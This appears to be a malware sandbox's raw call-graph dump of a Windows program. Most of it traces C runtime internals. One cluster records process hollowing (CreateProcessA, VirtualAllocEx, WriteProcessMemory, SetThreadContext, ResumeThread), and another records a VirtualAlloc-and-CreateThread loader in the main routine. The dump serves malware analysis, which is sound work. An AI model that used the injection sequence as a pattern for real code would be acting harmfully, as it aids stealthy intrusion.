13a92b _Yarn 15 API calls 15159->15161 15159->15162 15160->15159 15161->15162 15162->15140 15164 13a922 15163->15164 15165 133c91 15163->15165 15241 13a8fd LeaveCriticalSection 15164->15241 15169 133ca4 15165->15169 15240 1344b0 LeaveCriticalSection 15165->15240 15168 13a929 15168->15136 15169->15136 15176 13f71b 15170->15176 15175->15145 15197 13f0ca 15176->15197 15193 13f1b4 std::_Lockit::_Lockit 5 API calls 15194 13f748 15193->15194 15221 13f19a 15194->15221 15196 13f74d 15196->15196 15198 13f2b3 std::_Lockit::_Lockit 5 API calls 15197->15198 15199 13f0e0 15198->15199 15200 13f0e4 15199->15200 15201 13f2b3 std::_Lockit::_Lockit 5 API calls 15200->15201 15202 13f0fa 15201->15202 15203 13f0fe 15202->15203 15204 13f2b3 std::_Lockit::_Lockit 5 API calls 15203->15204 15205 13f114 15204->15205 15206 13f118 15205->15206 15207 13f2b3 std::_Lockit::_Lockit 5 API calls 15206->15207 15208 13f12e 15207->15208 15209 13f132 15208->15209 15210 13f2b3 std::_Lockit::_Lockit 5 API calls 15209->15210 15211 13f148 15210->15211 15212 13f14c 15211->15212 15213 13f2b3 std::_Lockit::_Lockit 5 API calls 15212->15213 15214 13f162 15213->15214 15215 13f166 15214->15215 15216 13f2b3 std::_Lockit::_Lockit 5 API calls 15215->15216 15217 13f17c 15216->15217 15218 13f180 15217->15218 15219 13f2b3 std::_Lockit::_Lockit 5 API calls 15218->15219 15220 13f196 15219->15220 15220->15193 15222 13f2b3 std::_Lockit::_Lockit 5 API calls 15221->15222 15223 13f1b0 15222->15223 15223->15196 15225 133d6a _Yarn 15 API calls 15224->15225 15226 133ce0 15225->15226 15226->15135 15228 134460 EncodePointer 15227->15228 15229 13b237 15227->15229 15228->15154 15228->15229 15230 142f8a __purecall 2 API calls 15229->15230 15231 13b23c 15230->15231 15232 13b247 15231->15232 15233 142fcf __purecall 41 API calls 15231->15233 15234 13b251 IsProcessorFeaturePresent 15232->15234 15239 13b270 15232->15239 15233->15232 15235 13b25d 15234->15235 15237 138f06 __purecall 8 API calls 15235->15237 15236 13c42e __purecall 23 API calls 15238 13b27a 15236->15238 15237->15239 15239->15236 15240->15169 15241->15168 15243 13932b 15242->15243 15246 139340 15242->15246 15244 13b318 __strnicoll 14 API calls 15243->15244 15245 139330 15244->15245 15247 139102 __strnicoll 41 API calls 15245->15247 15246->15125 15248 13933b 15247->15248 15248->15125 15250 134c73 15249->15250 15251 134c6c 15249->15251 15258 13dfed 15250->15258 15255 13df70 15251->15255 15254 131055 15256 13dfed 44 API calls 15255->15256 15257 13df82 15256->15257 15257->15254 15261 13dd39 15258->15261 15262 13dd45 ___scrt_is_nonwritable_in_current_image 15261->15262 15269 13a8b5 EnterCriticalSection 15262->15269 15264 13dd53 15270 13dd94 15264->15270 15266 13dd60 15280 13dd88 15266->15280 15269->15264 15271 13ddaf 15270->15271 15272 13de22 std::_Lockit::_Lockit 15270->15272 15271->15272 15273 13de02 15271->15273 15283 147ba0 15271->15283 15272->15266 15273->15272 15275 147ba0 44 API calls 15273->15275 15277 13de18 15275->15277 15276 13ddf8 15278 13efd8 ___free_lconv_mon 14 API calls 15276->15278 15279 13efd8 ___free_lconv_mon 14 API calls 15277->15279 15278->15273 15279->15272 15311 13a8fd LeaveCriticalSection 15280->15311 15282 13dd71 15282->15254 15284 147bad 15283->15284 15285 147bc8 15283->15285 15284->15285 15286 147bb9 15284->15286 15287 147bd7 15285->15287 15292 1493cf 15285->15292 15289 13b318 __strnicoll 14 API calls 15286->15289 15299 143ba6 15287->15299 15291 147bbe __fread_nolock 15289->15291 15291->15276 15293 1493ef HeapSize 15292->15293 15294 1493da 15292->15294 15293->15287 15295 13b318 __strnicoll 14 API calls 15294->15295 15296 1493df 15295->15296 15297 139102 __strnicoll 41 API calls 15296->15297 15298 1493ea 15297->15298 15298->15287 15300 143bb3 15299->15300 15301 143bbe 15299->15301 15302 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 15300->15302 15303 143bc6 15301->15303 15309 143bcf __Getctype 15301->15309 15307 143bbb 15302->15307 15304 13efd8 ___free_lconv_mon 14 API calls 15303->15304 15304->15307 15305 143bd4 15308 13b318 __strnicoll 14 API calls 15305->15308 15306 143bf9 HeapReAlloc 15306->15307 15306->15309 15307->15291 15308->15307 15309->15305 15309->15306 15310 13dc55 ctype 2 API calls 15309->15310 15310->15309 15311->15282 15391 131000 15396 132456 15391->15396 15393 131013 15394 134c8a 44 API calls 15393->15394 15395 13101d 15394->15395 15397 132462 __EH_prolog3 15396->15397 15400 133180 15397->15400 15399 1324b4 ctype 15399->15393 15409 132e24 15400->15409 15402 13318b 15417 1337dd 15402->15417 15404 13319e 15405 1331b7 15404->15405 15406 131eb1 std::ios_base::_Init 43 API calls 15404->15406 15407 1331c3 15405->15407 15421 1342a8 15405->15421 15406->15405 15407->15399 15410 132e30 __EH_prolog3 15409->15410 15411 131eb1 std::ios_base::_Init 43 API calls 15410->15411 15412 132e61 15411->15412 15413 134918 ctype 43 API calls 15412->15413 15414 132e68 15413->15414 15415 133e12 std::ios_base::_Init 47 API calls 15414->15415 15416 132e79 ctype 15414->15416 15415->15416 15416->15402 15418 1337e9 __EH_prolog3 15417->15418 15426 13239c 15418->15426 15420 133801 std::ios_base::_Ios_base_dtor ctype 15420->15404 15422 133c2f std::_Lockit::_Lockit 7 API calls 15421->15422 15423 1342b8 15422->15423 15424 133c87 std::_Lockit::~_Lockit 2 API calls 15423->15424 15425 1342f6 15424->15425 15425->15407 15427 1323a8 __EH_prolog3 15426->15427 15428 133c2f std::_Lockit::_Lockit 7 API calls 15427->15428 15429 1323b2 15428->15429 15442 132867 15429->15442 15431 1323dc 15433 133c87 std::_Lockit::~_Lockit 2 API calls 15431->15433 15432 1323c9 15432->15431 15448 132cbe 15432->15448 15435 132423 ctype 15433->15435 15435->15420 15436 1323ec 15437 1323f3 15436->15437 15438 13242b 15436->15438 15458 133de0 15437->15458 15461 132f6e 15438->15461 15443 132873 15442->15443 15444 132897 15442->15444 15445 133c2f std::_Lockit::_Lockit 7 API calls 15443->15445 15444->15432 15446 13287d 15445->15446 15447 133c87 std::_Lockit::~_Lockit 2 API calls 15446->15447 15447->15444 15450 132cca __EH_prolog3 15448->15450 15449 132d1b ctype 15449->15436 15450->15449 15451 134918 ctype 43 API calls 15450->15451 15452 132ce3 ctype 15451->15452 15457 132d0a 15452->15457 15465 1325a5 15452->15465 15455 132cff 15477 13252f 15455->15477 15457->15449 15480 132781 15457->15480 15459 134918 ctype 43 API calls 15458->15459 15460 133deb 15459->15460 15460->15431 15462 132f7c Concurrency::cancel_current_task 15461->15462 15463 135a72 Concurrency::cancel_current_task RaiseException 15462->15463 15464 132f8a 15463->15464 15466 1325b1 __EH_prolog3 15465->15466 15467 133c2f std::_Lockit::_Lockit 7 API calls 15466->15467 15468 1325be 15467->15468 15469 1325f2 15468->15469 15470 132607 15468->15470 15497 133f10 15469->15497 15506 1321c9 15470->15506 15474 1325fb ctype 15474->15455 15553 134025 15477->15553 15598 133f5b 15480->15598 15483 1327bc 15485 13a859 ___vcrt_freefls@4 14 API calls 15483->15485 15487 1327cf 15483->15487 15484 13a859 ___vcrt_freefls@4 14 API calls 15484->15483 15485->15487 15486 1327e0 15489 1327f1 15486->15489 15490 13a859 ___vcrt_freefls@4 14 API calls 15486->15490 15487->15486 15488 13a859 ___vcrt_freefls@4 14 API calls 15487->15488 15488->15486 15491 132802 15489->15491 15492 13a859 ___vcrt_freefls@4 14 API calls 15489->15492 15490->15489 15493 132813 15491->15493 15494 13a859 ___vcrt_freefls@4 14 API calls 15491->15494 15492->15491 15495 133c87 std::_Lockit::~_Lockit 2 API calls 15493->15495 15494->15493 15496 13281e 15495->15496 15496->15449 15511 13ab8b 15497->15511 15500 133d6a _Yarn 15 API calls 15501 133f34 15500->15501 15502 133f44 15501->15502 15503 13ab8b std::_Locinfo::_Locinfo_ctor 69 API calls 15501->15503 15504 133d6a _Yarn 15 API calls 15502->15504 15503->15502 15505 133f58 15504->15505 15505->15474 15550 13215d 15506->15550 15509 135a72 Concurrency::cancel_current_task RaiseException 15510 1321e8 15509->15510 15512 13f71b std::_Lockit::_Lockit 5 API calls 15511->15512 15513 13ab98 15512->15513 15516 13a936 15513->15516 15517 13a942 ___scrt_is_nonwritable_in_current_image 15516->15517 15524 13a8b5 EnterCriticalSection 15517->15524 15519 13a950 15525 13a991 15519->15525 15524->15519 15526 13aaf0 std::_Locinfo::_Locinfo_ctor 69 API calls 15525->15526 15527 13a9ac 15526->15527 15528 13ec90 __Getctype 41 API calls 15527->15528 15546 13a95d 15527->15546 15529 13a9b9 15528->15529 15530 1426bc std::_Locinfo::_Locinfo_ctor 43 API calls 15529->15530 15531 13a9de 15530->15531 15532 13a9e5 15531->15532 15533 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 15531->15533 15535 13912f __Getctype 11 API calls 15532->15535 15532->15546 15534 13aa0a 15533->15534 15537 1426bc std::_Locinfo::_Locinfo_ctor 43 API calls 15534->15537 15534->15546 15536 13aaef 15535->15536 15538 13aa26 15537->15538 15539 13aa48 15538->15539 15540 13aa2d 15538->15540 15543 13efd8 ___free_lconv_mon 14 API calls 15539->15543 15544 13aa73 15539->15544 15540->15532 15541 13aa3f 15540->15541 15542 13efd8 ___free_lconv_mon 14 API calls 15541->15542 15542->15546 15543->15544 15545 13efd8 ___free_lconv_mon 14 API calls 15544->15545 15544->15546 15545->15546 15547 13a985 15546->15547 15548 13a8fd std::_Lockit::~_Lockit LeaveCriticalSection 15547->15548 15549 133f1c 15548->15549 15549->15500 15551 1319ca std::exception::exception 42 API calls 15550->15551 15552 13216f 15551->15552 15552->15509 15565 13ad24 15553->15565 15555 13402e __Getctype 15556 134066 15555->15556 15557 134048 15555->15557 15559 13abc3 __Getctype 41 API calls 15556->15559 15570 13abc3 15557->15570 15560 13404f 15559->15560 15575 13ad49 15560->15575 15563 132552 15563->15457 15566 13ec90 __Getctype 41 API calls 15565->15566 15567 13ad2f 15566->15567 15568 1426fa __Getctype 41 API calls 15567->15568 15569 13ad3f 15568->15569 15569->15555 15571 13ec90 __Getctype 41 API calls 15570->15571 15572 13abce 15571->15572 15573 1426fa __Getctype 41 API calls 15572->15573 15574 13abde 15573->15574 15574->15560 15576 13ec90 __Getctype 41 API calls 15575->15576 15577 13ad54 15576->15577 15578 1426fa __Getctype 41 API calls 15577->15578 15579 134077 15578->15579 15579->15563 15580 13b1d8 15579->15580 15581 13b1e5 15580->15581 15582 13b220 15580->15582 15581->15581 15583 13a92b _Yarn 15 API calls 15581->15583 15582->15563 15584 13b208 15583->15584 15584->15582 15589 142e58 15584->15589 15587 13912f __Getctype 11 API calls 15588 13b236 15587->15588 15590 142e66 15589->15590 15592 142e74 15589->15592 15590->15592 15596 142e8e 15590->15596 15591 13b318 __strnicoll 14 API calls 15593 142e7e 15591->15593 15592->15591 15594 139102 __strnicoll 41 API calls 15593->15594 15595 13b219 15594->15595 15595->15582 15595->15587 15596->15595 15597 13b318 __strnicoll 14 API calls 15596->15597 15597->15593 15599 133f67 15598->15599 15601 1327ad 15598->15601 15600 13ab8b std::_Locinfo::_Locinfo_ctor 69 API calls 15599->15600 15600->15601 15601->15483 15601->15484 17435 13eb57 17436 13eb62 17435->17436 17437 13eb72 17435->17437 17441 13eb78 17436->17441 17440 13efd8 ___free_lconv_mon 14 API calls 17440->17437 17442 13eb93 17441->17442 17443 13eb8d 17441->17443 17445 13efd8 ___free_lconv_mon 14 API calls 17442->17445 17444 13efd8 ___free_lconv_mon 14 API calls 17443->17444 17444->17442 17446 13eb9f 17445->17446 17447 13efd8 ___free_lconv_mon 14 API calls 17446->17447 17448 13ebaa 17447->17448 17449 13efd8 ___free_lconv_mon 14 API calls 17448->17449 17450 13ebb5 17449->17450 17451 13efd8 ___free_lconv_mon 14 API calls 17450->17451 17452 13ebc0 17451->17452 17453 13efd8 ___free_lconv_mon 14 API calls 17452->17453 17454 13ebcb 17453->17454 17455 13efd8 ___free_lconv_mon 14 API calls 17454->17455 17456 13ebd6 17455->17456 17457 13efd8 ___free_lconv_mon 14 API calls 17456->17457 17458 13ebe1 17457->17458 17459 13efd8 ___free_lconv_mon 14 API calls 17458->17459 17460 13ebec 17459->17460 17461 13efd8 ___free_lconv_mon 14 API calls 17460->17461 17462 13ebfa 17461->17462 17467 13e9a4 17462->17467 17468 13e9b0 ___scrt_is_nonwritable_in_current_image 17467->17468 17483 13a8b5 EnterCriticalSection 17468->17483 17470 13e9e4 17484 13ea03 17470->17484 17472 13e9ba 17472->17470 17474 13efd8 ___free_lconv_mon 14 API calls 17472->17474 17474->17470 17475 13ea0f 17476 13ea1b ___scrt_is_nonwritable_in_current_image 17475->17476 17488 13a8b5 EnterCriticalSection 17476->17488 17478 13ea25 17479 13ec45 __Getctype 14 API calls 17478->17479 17480 13ea38 17479->17480 17489 13ea58 17480->17489 17483->17472 17487 13a8fd LeaveCriticalSection 17484->17487 17486 13e9f1 17486->17475 17487->17486 17488->17478 17492 13a8fd LeaveCriticalSection 17489->17492 17491 13ea46 17491->17440 17492->17491 14415 c4018d 14418 c401c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 14415->14418 14417 c403a2 WriteProcessMemory 14419 c403e7 14417->14419 14418->14417 14420 c403ec WriteProcessMemory 14419->14420 14421 c40429 WriteProcessMemory Wow64SetThreadContext ResumeThread 14419->14421 14420->14419 14422 13478c 14423 134798 ___scrt_is_nonwritable_in_current_image 14422->14423 14448 134ac4 14423->14448 14425 13479f 14426 1348f8 14425->14426 14435 1347c9 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock __purecall 14425->14435 14496 134fa6 IsProcessorFeaturePresent 14426->14496 14428 1348ff 14429 134905 14428->14429 14476 13c46a 14428->14476 14431 13c42e __purecall 23 API calls 14429->14431 14432 13490d 14431->14432 14433 1347e8 14434 134869 14456 13c0a8 14434->14456 14435->14433 14435->14434 14479 13c444 14435->14479 14438 13486f 14460 14c274 14438->14460 14443 134894 14444 13489d 14443->14444 14487 13c41f 14443->14487 14490 134c35 14444->14490 14449 134acd 14448->14449 14500 134ccc IsProcessorFeaturePresent 14449->14500 14453 134ade 14455 134ae2 14453->14455 14510 137a2d 14453->14510 14455->14425 14457 13c0b1 14456->14457 14458 13c0b6 14456->14458 14570 13be02 14457->14570 14458->14438 14665 13116f 14460->14665 14462 14c295 GetModuleHandleA 14673 131852 14462->14673 14464 14c2b1 _strlen 14677 131e58 14464->14677 14466 14c2c7 _strlen 14467 131e58 std::ios_base::_Init 43 API calls 14466->14467 14468 14c2dd GetProcAddress 14467->14468 14469 14c2f8 14468->14469 14681 14c20e VirtualAlloc 14469->14681 14471 14c2fd 14686 131dfe 14471->14686 14474 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14475 134886 14474->14475 14485 1350c0 GetModuleHandleW 14475->14485 14477 13c252 __purecall 23 API calls 14476->14477 14478 13c47b 14477->14478 14478->14429 14480 13c45a ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 14479->14480 14480->14434 14481 13ec90 __Getctype 41 API calls 14480->14481 14484 13e1cd 14481->14484 14482 13b237 __purecall 41 API calls 14483 13e1f7 14482->14483 14484->14482 14486 134890 14485->14486 14486->14428 14486->14443 14488 13c252 __purecall 23 API calls 14487->14488 14489 13c42a 14488->14489 14489->14444 14491 134c41 14490->14491 14492 1348a6 14491->14492 14951 13e12d 14491->14951 14492->14433 14494 134c4f 14495 137a2d ___scrt_uninitialize_crt 7 API calls 14494->14495 14495->14492 14497 134fbc __fread_nolock __purecall 14496->14497 14498 135067 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14497->14498 14499 1350ab __purecall 14498->14499 14499->14428 14501 134ad9 14500->14501 14502 137a0e 14501->14502 14516 138ae7 14502->14516 14505 137a17 14505->14453 14507 137a1f 14508 137a2a 14507->14508 14530 138b23 14507->14530 14508->14453 14511 137a40 14510->14511 14512 137a36 14510->14512 14511->14455 14513 137ba6 ___vcrt_uninitialize_ptd 6 API calls 14512->14513 14514 137a3b 14513->14514 14515 138b23 ___vcrt_uninitialize_locks DeleteCriticalSection 14514->14515 14515->14511 14518 138af0 14516->14518 14519 138b19 14518->14519 14520 137a13 14518->14520 14534 138d2c 14518->14534 14521 138b23 ___vcrt_uninitialize_locks DeleteCriticalSection 14519->14521 14520->14505 14522 137b73 14520->14522 14521->14520 14551 138c3d 14522->14551 14525 137b88 14525->14507 14528 137ba3 14528->14507 14531 138b2e 14530->14531 14533 138b4d 14530->14533 14532 138b38 DeleteCriticalSection 14531->14532 14532->14532 14532->14533 14533->14505 14539 138b52 14534->14539 14537 138d64 InitializeCriticalSectionAndSpinCount 14538 138d4f 14537->14538 14538->14518 14540 138b6f 14539->14540 14543 138b73 14539->14543 14540->14537 14540->14538 14541 138bdb GetProcAddress 14541->14540 14543->14540 14543->14541 14544 138bcc 14543->14544 14546 138bf2 LoadLibraryExW 14543->14546 14544->14541 14545 138bd4 FreeLibrary 14544->14545 14545->14541 14547 138c39 14546->14547 14548 138c09 GetLastError 14546->14548 14547->14543 14548->14547 14549 138c14 ___vcrt_FlsFree 14548->14549 14549->14547 14550 138c2a LoadLibraryExW 14549->14550 14550->14543 14552 138b52 ___vcrt_FlsFree 5 API calls 14551->14552 14553 138c57 14552->14553 14554 138c70 TlsAlloc 14553->14554 14555 137b7d 14553->14555 14555->14525 14556 138cee 14555->14556 14557 138b52 ___vcrt_FlsFree 5 API calls 14556->14557 14558 138d08 14557->14558 14559 138d23 TlsSetValue 14558->14559 14560 137b96 14558->14560 14559->14560 14560->14528 14561 137ba6 14560->14561 14562 137bb0 14561->14562 14563 137bb6 14561->14563 14565 138c78 14562->14565 14563->14525 14566 138b52 ___vcrt_FlsFree 5 API calls 14565->14566 14567 138c92 14566->14567 14568 138caa TlsFree 14567->14568 14569 138c9e 14567->14569 14568->14569 14569->14563 14571 13be0b 14570->14571 14575 13be21 14570->14575 14571->14575 14576 13be2e 14571->14576 14573 13be18 14573->14575 14593 13bf99 14573->14593 14575->14458 14577 13be37 14576->14577 14578 13be3a 14576->14578 14577->14573 14601 144ee4 14578->14601 14583 13be57 14628 13be88 14583->14628 14584 13be4b 14585 13efd8 ___free_lconv_mon 14 API calls 14584->14585 14587 13be51 14585->14587 14587->14573 14589 13efd8 ___free_lconv_mon 14 API calls 14590 13be7b 14589->14590 14591 13efd8 ___free_lconv_mon 14 API calls 14590->14591 14592 13be81 14591->14592 14592->14573 14594 13c00a 14593->14594 14599 13bfa8 14593->14599 14594->14575 14595 13ef7b __Getctype 14 API calls 14595->14599 14596 13c00e 14597 13efd8 ___free_lconv_mon 14 API calls 14596->14597 14597->14594 14598 143e34 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 14598->14599 14599->14594 14599->14595 14599->14596 14599->14598 14600 13efd8 ___free_lconv_mon 14 API calls 14599->14600 14600->14599 14602 144eed 14601->14602 14603 13be40 14601->14603 14604 13ed4b 41 API calls 14602->14604 14607 1451e6 GetEnvironmentStringsW 14603->14607 14605 144f10 14604->14605 14606 144cef 52 API calls 14605->14606 14606->14603 14608 13be45 14607->14608 14609 1451fe 14607->14609 14608->14583 14608->14584 14610 143e34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14609->14610 14611 14521b 14610->14611 14612 145225 FreeEnvironmentStringsW 14611->14612 14613 145230 14611->14613 14612->14608 14614 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14613->14614 14615 145237 14614->14615 14616 145250 14615->14616 14617 14523f 14615->14617 14618 143e34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 14616->14618 14619 13efd8 ___free_lconv_mon 14 API calls 14617->14619 14620 145260 14618->14620 14621 145244 FreeEnvironmentStringsW 14619->14621 14622 145267 14620->14622 14623 14526f 14620->14623 14621->14608 14624 13efd8 ___free_lconv_mon 14 API calls 14622->14624 14625 13efd8 ___free_lconv_mon 14 API calls 14623->14625 14626 14526d FreeEnvironmentStringsW 14624->14626 14625->14626 14626->14608 14629 13be9d 14628->14629 14630 13ef7b __Getctype 14 API calls 14629->14630 14631 13bec4 14630->14631 14632 13becc 14631->14632 14642 13bed6 14631->14642 14633 13efd8 ___free_lconv_mon 14 API calls 14632->14633 14635 13be5e 14633->14635 14634 13bf33 14636 13efd8 ___free_lconv_mon 14 API calls 14634->14636 14635->14589 14636->14635 14637 13ef7b __Getctype 14 API calls 14637->14642 14638 13bf42 14659 13bf6a 14638->14659 14642->14634 14642->14637 14642->14638 14643 13bf5d 14642->14643 14646 13efd8 ___free_lconv_mon 14 API calls 14642->14646 14650 13e1f8 14642->14650 14647 13912f __Getctype 11 API calls 14643->14647 14644 13efd8 ___free_lconv_mon 14 API calls 14645 13bf4f 14644->14645 14648 13efd8 ___free_lconv_mon 14 API calls 14645->14648 14646->14642 14649 13bf69 14647->14649 14648->14635 14651 13e214 14650->14651 14652 13e206 14650->14652 14653 13b318 __strnicoll 14 API calls 14651->14653 14652->14651 14657 13e22c 14652->14657 14654 13e21c 14653->14654 14656 139102 __strnicoll 41 API calls 14654->14656 14655 13e226 14655->14642 14656->14655 14657->14655 14658 13b318 __strnicoll 14 API calls 14657->14658 14658->14654 14660 13bf77 14659->14660 14661 13bf48 14659->14661 14662 13bf8e 14660->14662 14663 13efd8 ___free_lconv_mon 14 API calls 14660->14663 14661->14644 14664 13efd8 ___free_lconv_mon 14 API calls 14662->14664 14663->14660 14664->14661 14668 13117b __EH_prolog3_catch _strlen 14665->14668 14667 1311d4 14694 131eb1 14667->14694 14690 131a71 14668->14690 14672 13130c ctype 14672->14462 14674 13186f _strlen 14673->14674 14848 13137d 14674->14848 14676 13187c 14676->14464 14678 131e98 14677->14678 14680 131e6e std::ios_base::_Init 14677->14680 14855 131746 14678->14855 14680->14466 14875 14c168 14681->14875 14683 14c236 _Yarn 14881 14c14e 14683->14881 14687 131e12 14686->14687 14688 131e09 14686->14688 14687->14474 14689 131478 _Deallocate 41 API calls 14688->14689 14689->14687 14692 131a80 14690->14692 14691 131a9e 14691->14667 14692->14691 14706 131f9c 14692->14706 14695 131304 14694->14695 14698 131ec8 std::ios_base::_Init 14694->14698 14701 131b4b 14695->14701 14697 131f1a 14700 131f01 14698->14700 14714 131a17 14698->14714 14717 135a72 14700->14717 14830 1321e9 14701->14830 14703 131b53 14704 131b25 14703->14704 14834 131d61 14703->14834 14704->14672 14707 131fa8 __EH_prolog3_catch 14706->14707 14708 13204d ctype 14707->14708 14709 131a71 51 API calls 14707->14709 14708->14691 14712 131fc7 14709->14712 14710 132045 14711 131b4b 51 API calls 14710->14711 14711->14708 14712->14710 14713 131eb1 std::ios_base::_Init 43 API calls 14712->14713 14713->14710 14720 131ad1 14714->14720 14718 135ab9 RaiseException 14717->14718 14719 135a8c 14717->14719 14718->14697 14719->14718 14721 131852 std::ios_base::_Init 43 API calls 14720->14721 14722 131af0 14721->14722 14729 1318cc 14722->14729 14725 131dfe std::ios_base::_Init 41 API calls 14726 131b09 14725->14726 14727 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14726->14727 14728 131a2c 14727->14728 14728->14700 14740 13181e 14729->14740 14736 131dfe std::ios_base::_Init 41 API calls 14737 13190f 14736->14737 14738 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14737->14738 14739 13192e 14738->14739 14739->14725 14741 13183e 14740->14741 14760 1313ee 14741->14760 14743 13184b 14744 131cdf 14743->14744 14745 131d10 14744->14745 14746 131cf9 _strlen 14744->14746 14748 131e58 std::ios_base::_Init 43 API calls 14745->14748 14747 131e58 std::ios_base::_Init 43 API calls 14746->14747 14747->14745 14749 131d37 14748->14749 14750 131dfe std::ios_base::_Init 41 API calls 14749->14750 14751 131d3f std::ios_base::_Init 14750->14751 14752 131dfe std::ios_base::_Init 41 API calls 14751->14752 14753 131d52 14752->14753 14754 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14753->14754 14755 1318fc 14754->14755 14756 131a50 14755->14756 14757 131a5d 14756->14757 14812 1319ca 14757->14812 14761 131450 14760->14761 14764 1313ff std::ios_base::_Init 14760->14764 14775 131e24 14761->14775 14766 131406 _Yarn std::ios_base::_Init 14764->14766 14767 131319 14764->14767 14766->14743 14768 131324 14767->14768 14769 13132c 14767->14769 14778 13133b 14768->14778 14771 131338 14769->14771 14793 134918 14769->14793 14771->14766 14773 13132a 14773->14766 14774 131336 14774->14766 14807 1321a9 14775->14807 14779 131de1 Concurrency::cancel_current_task 14778->14779 14780 13134a 14778->14780 14784 135a72 Concurrency::cancel_current_task RaiseException 14779->14784 14781 134918 ctype 43 API calls 14780->14781 14782 131350 14781->14782 14782->14779 14783 131357 14782->14783 14785 139112 14782->14785 14783->14773 14786 131dfd 14784->14786 14787 13904e __strnicoll 41 API calls 14785->14787 14788 131e12 14786->14788 14791 131478 _Deallocate 41 API calls 14786->14791 14789 139121 14787->14789 14788->14773 14790 13912f __Getctype 11 API calls 14789->14790 14792 13912e 14790->14792 14791->14788 14796 13491d 14793->14796 14794 13a92b _Yarn 15 API calls 14794->14796 14795 134937 14795->14774 14796->14794 14796->14795 14797 13dc55 ctype EnterCriticalSection LeaveCriticalSection 14796->14797 14798 134939 14796->14798 14797->14796 14799 134943 ctype 14798->14799 14800 131de1 Concurrency::cancel_current_task 14798->14800 14803 135a72 Concurrency::cancel_current_task RaiseException 14799->14803 14801 135a72 Concurrency::cancel_current_task RaiseException 14800->14801 14802 131dfd 14801->14802 14805 131e12 14802->14805 14806 131478 _Deallocate 41 API calls 14802->14806 14804 135231 14803->14804 14805->14774 14806->14805 14808 132123 std::invalid_argument::invalid_argument 42 API calls 14807->14808 14809 1321ba 14808->14809 14810 135a72 Concurrency::cancel_current_task RaiseException 14809->14810 14811 1321c8 14810->14811 14815 1359f0 14812->14815 14816 1359fd 14815->14816 14822 131907 14815->14822 14816->14822 14823 13a92b 14816->14823 14819 13e1f8 ___std_exception_copy 41 API calls 14821 135a2a 14819->14821 14820 13a859 ___vcrt_freefls@4 14 API calls 14820->14822 14821->14820 14822->14736 14828 142001 __Getctype 14823->14828 14824 14203f 14825 13b318 __strnicoll 14 API calls 14824->14825 14827 135a1a 14825->14827 14826 14202a HeapAlloc 14826->14827 14826->14828 14827->14819 14827->14821 14828->14824 14828->14826 14829 13dc55 ctype EnterCriticalSection LeaveCriticalSection 14828->14829 14829->14828 14830->14703 14831 135e8d 14830->14831 14838 137b3c 14831->14838 14833 135e92 14833->14703 14836 131d6d __EH_prolog3_catch 14834->14836 14835 131da9 ctype 14835->14704 14836->14835 14837 131eb1 std::ios_base::_Init 43 API calls 14836->14837 14837->14835 14839 137b45 14838->14839 14840 137b48 GetLastError 14838->14840 14839->14833 14843 138cb3 14840->14843 14844 138b52 ___vcrt_FlsFree 5 API calls 14843->14844 14845 138ccd 14844->14845 14846 138ce5 TlsGetValue 14845->14846 14847 137b5d SetLastError 14845->14847 14846->14847 14847->14833 14849 1313e8 14848->14849 14853 13138e std::ios_base::_Init 14848->14853 14850 131e24 std::ios_base::_Init 43 API calls 14849->14850 14852 1313ed 14850->14852 14851 131395 std::ios_base::_Init 14851->14676 14853->14851 14854 131319 std::ios_base::_Init 43 API calls 14853->14854 14854->14851 14856 1317cf 14855->14856 14857 13175f std::ios_base::_Init 14855->14857 14858 131e24 std::ios_base::_Init 43 API calls 14856->14858 14860 131319 std::ios_base::_Init 43 API calls 14857->14860 14859 1317d4 14858->14859 14861 13177e std::ios_base::_Init 14860->14861 14863 1317b4 std::ios_base::_Init 14861->14863 14864 131478 14861->14864 14863->14680 14865 131485 14864->14865 14866 131492 _Deallocate 14864->14866 14868 131c2a 14865->14868 14866->14863 14869 131c47 14868->14869 14870 131c44 14868->14870 14871 13904e __strnicoll 41 API calls 14869->14871 14870->14866 14872 139121 14871->14872 14873 13912f __Getctype 11 API calls 14872->14873 14874 13912e 14873->14874 14878 14c1f4 14875->14878 14880 14c18c 14875->14880 14876 131478 _Deallocate 41 API calls 14877 14c208 14876->14877 14877->14683 14878->14876 14878->14877 14880->14878 14884 1314a4 14880->14884 14914 14c000 14881->14914 14885 1314b0 __EH_prolog3_catch 14884->14885 14886 1314d0 14885->14886 14887 13155c 14885->14887 14894 131e3a 14886->14894 14905 131e2f 14887->14905 14891 1314e5 14901 131ca7 14891->14901 14893 13153b ctype 14893->14880 14895 131e52 14894->14895 14896 131e45 14894->14896 14908 131de1 14895->14908 14897 131319 std::ios_base::_Init 43 API calls 14896->14897 14899 131e4e 14897->14899 14899->14891 14902 131cbf 14901->14902 14903 131caf 14901->14903 14902->14893 14904 131478 _Deallocate 41 API calls 14903->14904 14904->14902 14906 1321a9 std::_Xinvalid_argument 43 API calls 14905->14906 14907 131e39 14906->14907 14909 131def Concurrency::cancel_current_task 14908->14909 14910 135a72 Concurrency::cancel_current_task RaiseException 14909->14910 14911 131dfd 14910->14911 14912 131e12 14911->14912 14913 131478 _Deallocate 41 API calls 14911->14913 14913->14912 14925 131366 14914->14925 14916 14c037 14917 14c129 14916->14917 14920 131852 std::ios_base::_Init 43 API calls 14916->14920 14924 131dfe std::ios_base::_Init 41 API calls 14916->14924 14931 131150 14916->14931 14928 131567 14917->14928 14919 14c135 14921 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14919->14921 14920->14916 14922 14c147 CreateThread WaitForSingleObjectEx CloseHandle 14921->14922 14922->14471 14924->14916 